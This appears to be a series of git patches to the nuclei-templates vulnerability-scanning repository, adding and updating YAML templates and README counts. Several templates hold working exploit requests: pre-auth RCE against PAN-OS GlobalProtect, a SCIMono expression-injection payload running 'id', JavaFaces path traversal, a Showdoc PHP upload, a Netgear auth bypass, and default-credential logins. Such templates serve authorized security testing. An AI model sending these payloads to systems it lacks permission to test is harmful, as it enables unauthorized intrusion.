b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 235 | exposed-panels | 200 | +| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1585 files**. +**128 directories, 1586 files**. From 450c6b36900818a2c17da00cdcd53c20883f9fe3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 17:07:28 +0530 Subject: [PATCH 0774/4083] Updated POC for CVE-2017-15944 --- cves/2017/CVE-2017-15944.yaml | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 45e7bfda4b..2d6bd7fbd0 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -2,23 +2,27 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect - author: emadshanab - reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html + author: emadshanab,milo2012 + reference: | + - https://www.exploit-db.com/exploits/43342 + - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: high - tags: cve,cve2017,rce,vpn,paloalto + tags: cve,cve2017,rce,vpn,paloalto,globalprotect requests: - - method: GET - path: - - "{{BaseURL}}/global-protect/portal/css/login.css" + - raw: + - | + GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word words: - - "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT" - part: header + - "@start@Success@end@" + part: body - type: status status: - - 200 + - 200 \ No newline at end of file From 088a0bd7df1c063b62f1849c67c2fb33f7e8acdb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:05:27 +0530 Subject: [PATCH 0775/4083] Updated matchers --- default-logins/aem/adobe-aem-default-credentials.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index b6aacc7e67..254903e532 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -57,9 +57,11 @@ requests: matchers: - type: status status: - - 302 + - 200 - type: word part: header words: - - crx + - login-token + - crx.default + condition: and From 2bd83ae640ce416901b7e259e9b66429aced53e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 12:41:33 +0000 Subject: [PATCH 0776/4083] Auto Update README [Sat Jul 17 12:41:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6d6ebd7b7f..632ff9adf9 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 37 | file | 42 | dns | 10 | +| default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1586 files**. +**129 directories, 1587 files**. From 82c4e8762a3bd023cd9b43b6ef1ad8322432448e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 17 Jul 2021 18:23:05 +0530 Subject: [PATCH 0777/4083] Added aem-detection Reference - https://github.com/shifa123/detections --- technologies/aem-detection.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/aem-detection.yaml diff --git a/technologies/aem-detection.yaml b/technologies/aem-detection.yaml new file mode 100644 index 0000000000..85399c2790 --- /dev/null +++ b/technologies/aem-detection.yaml @@ -0,0 +1,26 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + severity: info + author: shifacyclewala,hackergautam + tags: aem,favicon,tech + reference: | + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" From 99a6f78dd1c7c28f691e5ed68e23eca9754ca9b9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 18:31:38 +0530 Subject: [PATCH 0778/4083] Updated AEM workflow --- workflows/aem-workflow.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index c0f15c89d2..ff8f7019c7 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -7,4 +7,6 @@ info: tags: workflow workflows: - - template: misconfiguration/aem/ \ No newline at end of file + - template: technologies/aem-detection.yaml + subtemplates: + - tags: aem \ No newline at end of file From 1431a9611ca8d30d3492e85467d9160138f06309 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 13:05:20 +0000 Subject: [PATCH 0779/4083] Auto Update README [Sat Jul 17 13:05:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 632ff9adf9..90de9948ae 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 123 | +| takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1587 files**. +**129 directories, 1588 files**. From 41436ccef8798a055b862a37453cccc8a93dfabe Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 21:44:56 +0530 Subject: [PATCH 0780/4083] matcher update --- cves/2013/CVE-2013-3827.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index af44677113..d6883d7e82 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -1,11 +1,14 @@ id: CVE-2013-3827 info: - name: CVE-2013-3827 + name: Javafaces LFI author: Random-Robbie severity: medium - description: Javafaces LFI - tags: cve,cve2013,lfi + description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + tags: cve,cve2013,lfi,javafaces,oracle + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 + - https://www.exploit-db.com/exploits/38802 requests: - method: GET @@ -20,9 +23,16 @@ requests: - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and matchers: - type: word words: - - "web-app version" + - "" part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From e0bbc7f160283ab969254b1f6af325c1c230bb18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:20:40 +0000 Subject: [PATCH 0781/4083] Auto Update README [Sat Jul 17 16:20:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 90de9948ae..42c3fbe9e1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | +| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1588 files**. +**129 directories, 1589 files**. From 1212034229b838e528740999577b12350f13e005 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:40:05 +0000 Subject: [PATCH 0782/4083] Auto Update README [Sat Jul 17 16:40:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 42c3fbe9e1..75a881f2a5 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 38 | file | 42 | dns | 10 | +| default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1589 files**. +**130 directories, 1590 files**. From e4f51a0286c2a7e94f926236c20466ce9244dc0d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 22:14:18 +0530 Subject: [PATCH 0783/4083] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index bab13679aa..5f57fd013e 100644 --- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -31,7 +31,6 @@ requests: part: header words: - "SAP Internet Graphics Server" - condition: and extractors: - type: kval From 0debdc4cd18d37e23f4144095e0be5ca5501da94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:45:21 +0000 Subject: [PATCH 0784/4083] Auto Update README [Sat Jul 17 16:45:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 75a881f2a5..461fb9793e 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 124 | +| takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1590 files**. +**130 directories, 1591 files**. From 9eabca6e4caf3d03686a479b5e959ee7b67d0915 Mon Sep 17 00:00:00 2001 From: Prial Islam <25204004+0xPrial@users.noreply.github.com> Date: Sat, 17 Jul 2021 22:55:19 +0600 Subject: [PATCH 0785/4083] Updated Heroku and netlify takeover detection --- takeovers/heroku-takeover.yaml | 3 +-- takeovers/netlify-takeover.yaml | 6 +++--- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 64115ff057..4a6ac2476e 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -15,7 +15,6 @@ requests: matchers: - type: word words: - - "There's nothing here, yet." - "herokucdn.com/error-pages/no-such-app.html" - "No such app" condition: and \ No newline at end of file diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 9c447ac42f..02ec1285a5 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "Not Found" + - "Not found - Request ID:" - type: word words: - - "server: Netlify" + - "Netlify" part: header \ No newline at end of file From 63ae086b6792aec403dea53dde2b28082d01f004 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:02:43 +0530 Subject: [PATCH 0786/4083] Payload + matcher update --- .../other/showdoc-file-upload-rce.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index a83e353f93..63fa6a1f77 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -1,4 +1,5 @@ id: showdoc-file-upload-rce + info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu @@ -20,7 +21,7 @@ requests: Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain - + ----------------------------835846770881083140190633-- - | @@ -37,11 +38,12 @@ requests: regex: - '/Uploads\\(.*?)"\,"success"' - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_2, "PHP Extension")' - - 'contains(body_2, "PHP Version")' - - 'status_code_2 == 200' - condition: and + - type: word + words: + - '3c7cb9f46815a790686b857fdbc4295a' + + - type: status + status: + - 200 \ No newline at end of file From 7ef332e9d07920ee088a672d3405940406d97458 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:20:57 +0530 Subject: [PATCH 0787/4083] Added VisionHub Default Credentials --- .../visionhub-default-credentials.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/visionhub/visionhub-default-credentials.yaml diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml new file mode 100644 index 0000000000..c4bb066e85 --- /dev/null +++ b/default-logins/visionhub/visionhub-default-credentials.yaml @@ -0,0 +1,27 @@ +id: visionhub-default-credentials + +info: + name: VisionHub Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on VisionHub application. + tags: visionhub,default-login + reference: https://www.qognify.com/products/visionhub/ + +requests: + - method: POST + path: + - '{{BaseURL}}/VisionHubWebApi/api/Login' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 \ No newline at end of file From f58d78772492b0db1e828671eb33ac74a647410a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 17:53:56 +0000 Subject: [PATCH 0788/4083] Auto Update README [Sat Jul 17 17:53:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 461fb9793e..b5c762b493 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 39 | file | 42 | dns | 10 | +| default-logins | 40 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1591 files**. +**131 directories, 1592 files**. From 08324918439629cc2b2055a2d6a3b3c935ab6ac2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:28:19 +0530 Subject: [PATCH 0789/4083] Added Dell EMC ECOM Default Credentials --- .../dell-emc-ecom-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/dell/dell-emc-ecom-default-credentials.yaml diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml new file mode 100644 index 0000000000..5c46e83359 --- /dev/null +++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml @@ -0,0 +1,31 @@ +id: dell-emc-ecom-default-credentials + +info: + name: Dell EMC ECOM Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:#1Password on Dell EMC ECOM application. + reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + tags: dell,emc,ecom,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}' + headers: + Authorization: Basic YWRtaW46IzFQYXNzd29yZA== + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: ECOMSecurity" + part: header + + - type: word + words: + - "Welcome to ECOM" + + - type: status + status: + - 200 \ No newline at end of file From 8030b4635519e05fb0c5dd0c710a0f9a00f95a77 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:30:55 +0530 Subject: [PATCH 0790/4083] Added HortonWorks SmartSense Default Credentials --- ...nworks-smartsense-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml new file mode 100644 index 0000000000..132cee76fd --- /dev/null +++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml @@ -0,0 +1,31 @@ +id: hortonworks-smartsense-default-credentials + +info: + name: HortonWorks SmartSense Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on HortonWorks SmartSense application. + reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + tags: hortonworks,smartsense,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}/apt/v1/context' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SUPPORTSESSIONID" + part: header + + - type: word + words: + - "smartsenseId" + + - type: status + status: + - 200 \ No newline at end of file From 78e7242792d12292cf77cade1a7e49903e7d789a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:35:39 +0530 Subject: [PATCH 0791/4083] Added Palo Alto Networks PAN-OS Default Credentials --- .../paloalto/panos-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/paloalto/panos-default-credentials.yaml diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml new file mode 100644 index 0000000000..15bc58afa5 --- /dev/null +++ b/default-logins/paloalto/panos-default-credentials.yaml @@ -0,0 +1,31 @@ +id: panos-default-credentials + +info: + name: Palo Alto Networks PAN-OS Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: paloalto,panos,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/php/login.php' + + body: user=admin&passwd=admin&challengePwd=&ok=Login + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: PHPSESSID" + part: header + + - type: word + words: + - "Warning: Your device is still configured with the default admin" + + - type: status + status: + - 200 \ No newline at end of file From 9e85e024d3090c0070fc28960c58a9330ff45dc0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:51:55 +0530 Subject: [PATCH 0792/4083] Added IDEMIA BIOMetrics Default Credentials --- ...idemia-biometrics-default-credentials.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/idemia/idemia-biometrics-default-credentials.yaml diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml new file mode 100644 index 0000000000..da3d4290e4 --- /dev/null +++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml @@ -0,0 +1,34 @@ +id: idemia-biometrics-default-credentials + +info: + name: IDEMIA BIOMetrics Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" + tags: idemia,biometrics,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/cgi-bin/login.cgi' + + body: password=12345 + + matchers-condition: and + matchers: + - type: word + words: + - "session_id=" + - "resource" + condition: and + + - type: word + words: + - "Invalid Password" + part: body + negative: true + + - type: status + status: + - 200 \ No newline at end of file From 14dac081716f55f25123085e2e8d557be8bbf373 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 18:23:30 +0000 Subject: [PATCH 0793/4083] Auto Update README [Sat Jul 17 18:23:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b5c762b493..b6fb139ccd 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 40 | file | 42 | dns | 10 | +| default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**131 directories, 1592 files**. +**134 directories, 1596 files**. From d2970f3529e9ad17d0d42fb04c27b02361aeb45e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:55:56 +0530 Subject: [PATCH 0794/4083] misc changes --- takeovers/heroku-takeover.yaml | 2 +- takeovers/netlify-takeover.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 4a6ac2476e..a6e03e96ac 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 02ec1285a5..58c0306995 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz From fb22fd40c53a7ab4ec380a48a87336ebd9828df5 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 18 Jul 2021 09:27:34 +0900 Subject: [PATCH 0795/4083] Create CVE-2020-27866.yaml This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-27866.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2020/CVE-2020-27866.yaml diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml new file mode 100644 index 0000000000..118e42e46e --- /dev/null +++ b/cves/2020/CVE-2020-27866.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-27866 + +info: + name: Netgear Authentication Bypass vulnerability + author: gy741 + severity: high + description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + tags: cve,cve2020,netgear,auth-bypass + reference: | + - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ + - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 + +requests: + - raw: + - | + GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Debug Enable' + part: body From aec3d87e729cfe60ec03bbbf4b40d1ea69aa4fd0 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 17 Jul 2021 23:15:08 -0400 Subject: [PATCH 0796/4083] Update exposed-gitignore.yaml New conditions to avoid false positives. --- exposures/configs/exposed-gitignore.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index d31f035d9c..61812fd088 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -24,7 +24,7 @@ requests: - type: dsl dsl: - - '!contains(tolower(body), " 50 " \ No newline at end of file + - "len(body) > 50 " From e4b2316bf0d0605d6d7f4b47e72ceb83bf631464 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Sun, 18 Jul 2021 11:11:56 +0700 Subject: [PATCH 0797/4083] Add CVE-2021-21479 --- cves/2021/CVE-2021-21479.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-21479.yaml diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml new file mode 100644 index 0000000000..bdfb72a5a7 --- /dev/null +++ b/cves/2021/CVE-2021-21479.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-21479 + +info: + name: SCIMono < v0.0.19 Remote Code Execution + author: dwisiswant0 + severity: critical + reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ + description: | + In SCIMono before 0.0.19, it is possible for an attacker to inject and + execute java expression compromising the availability and integrity of the system. + tags: cve,cve2021,scim,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" + matchers-condition: and + matchers: + - type: word + words: + - "The attribute value" + - "java.lang.UNIXProcess@" + - "has invalid value!" + part: body + condition: and + - type: status + status: + - 400 From 0a01f0cd791d0f3c568357e72a98c148bc717fd2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Jul 2021 16:44:57 +0530 Subject: [PATCH 0798/4083] Create CVE-2021-24213.yaml --- cves/2021/CVE-2021-24213.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2021/CVE-2021-24213.yaml diff --git a/cves/2021/CVE-2021-24213.yaml b/cves/2021/CVE-2021-24213.yaml new file mode 100644 index 0000000000..70284f7996 --- /dev/null +++ b/cves/2021/CVE-2021-24213.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-24213 + +info: + name: GiveWP 2.9.7 Reflected Cross-Site Scripting + author: dhiyaneshDk + severity: medium + reference: https://packetstormsecurity.com/files/161933/WordPress-GiveWP-2.9.7-Cross-Site-Scripting.html + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/edit.php?s=%22%3E&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From ed9418961d569be993880e0b63c13b849a36eb1b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Jul 2021 17:24:04 +0530 Subject: [PATCH 0799/4083] Create cortex-xsoar-login.yaml --- exposed-panels/cortex-xsoar-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 